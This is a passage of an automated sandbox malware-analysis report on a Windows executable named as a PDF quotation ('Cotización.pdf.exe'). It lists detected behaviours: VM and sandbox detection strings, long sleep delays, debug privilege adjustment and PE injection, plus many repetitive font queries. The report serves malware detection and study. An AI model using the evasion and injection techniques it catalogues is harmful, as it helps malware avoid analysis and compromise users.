                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

                Malware Analysis System Evasion:

                barindex
                Yara detected AntiVM3Show sources
                Source: Yara matchFile source: Process Memory Space: Cotizaci#U00f3n.pdf.exe PID: 1724, type: MEMORY
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                Source: Cotizaci#U00f3n.pdf.exe, 00000000.00000002.296339841.0000000003522000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                Source: Cotizaci#U00f3n.pdf.exe, 00000000.00000002.296339841.0000000003522000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe TID: 3564Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe TID: 4196Thread sleep time: -1320000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 16_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,16_2_00403D74
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeThread delayed: delay time: 60000Jump to behavior
                Source: Cotizaci#U00f3n.pdf.exe, 00000000.00000002.296339841.0000000003522000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
                Source: Cotizaci#U00f3n.pdf.exe, 00000000.00000002.296339841.0000000003522000.00000004.00000001.sdmpBinary or memory string: vmware
                Source: Cotizaci#U00f3n.pdf.exe, 00000000.00000002.296339841.0000000003522000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                Source: Cotizaci#U00f3n.pdf.exe, 00000000.00000002.296339841.0000000003522000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                Source: Cotizaci#U00f3n.pdf.exe, 00000000.00000002.296339841.0000000003522000.00000004.00000001.sdmpBinary or memory string: VMWARE
                Source: Cotizaci#U00f3n.pdf.exe, 00000000.00000002.296339841.0000000003522000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                Source: Cotizaci#U00f3n.pdf.exe, 00000000.00000002.296339841.0000000003522000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                Source: Cotizaci#U00f3n.pdf.exe, 00000000.00000002.296339841.0000000003522000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                Source: Cotizaci#U00f3n.pdf.exe, 00000000.00000002.296339841.0000000003522000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 16_2_0040317B mov eax, dword ptr fs:[00000030h]16_2_0040317B
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 16_2_00402B7C GetProcessHeap,RtlAllocateHeap,16_2_00402B7C
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion:

                barindex
                Injects a PE file into a foreign processesShow sources
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeMemory written: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess created: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe {path}Jump to behavior
                Source: Cotizaci#U00f3n.pdf.exe, 00000010.00000002.468587281.00000000013D0000.00000002.00000001.sdmpBinary or memory string: Program Manager
                Source: Cotizaci#U00f3n.pdf.exe, 00000010.00000002.468587281.00000000013D0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                Source: Cotizaci#U00f3n.pdf.exe, 00000010.00000002.468587281.00000000013D0000.00000002.00000001.sdmpBinary or memory string: Progman
                Source: Cotizaci#U00f3n.pdf.exe, 00000010.00000002.468587281.00000000013D0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
